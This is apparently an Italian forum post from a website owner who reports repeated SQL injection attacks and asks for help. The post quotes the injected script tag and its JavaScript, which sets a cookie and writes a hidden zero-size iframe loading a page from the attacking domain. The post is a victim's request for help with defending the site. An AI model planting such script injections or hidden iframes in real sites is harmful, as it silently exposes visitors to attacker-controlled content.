Dato che abbiamo ricevuto diversi attacchi tramite SQL Injection al nostro sito, vorrei sapere se c'è qualcuno in grado di farmi una verifica per vedere da dove si possa eseguire tale tipo di attacco, dato che non ci sono form nel sito.
L'attacco che riceviamo è sempre da parte di un certo www.adw95.com con lo script <script src=http://www.adw95.com/b.js></script> che contiene questo codice
Che esattamente non so cosa faccia, ma temo serva a leggere i dati dei cookie, che tra l'altro non usiamo nel nostro sito.codice:window.status=""; var cookieString = document.cookie; var start = cookieString.indexOf("banner82="); if (start != -1) {}else{ var expires = new Date(); expires.setTime(expires.getTime()+24*1*60*60*1000); document.cookie = "banner82=update;expires=" + expires.toGMTString(); try{ document.write("<iframe src=http://www.adw95.com/cgi-bin/index.cgi?admin width=0 height=0 frameborder=0></iframe>"); } catch(e) { }; }
La mia competenza in fatto di sicurezza è piuttosto blanda, per cui se ho detto delle cavolate non mi prendete in giro![]()
Grazie mille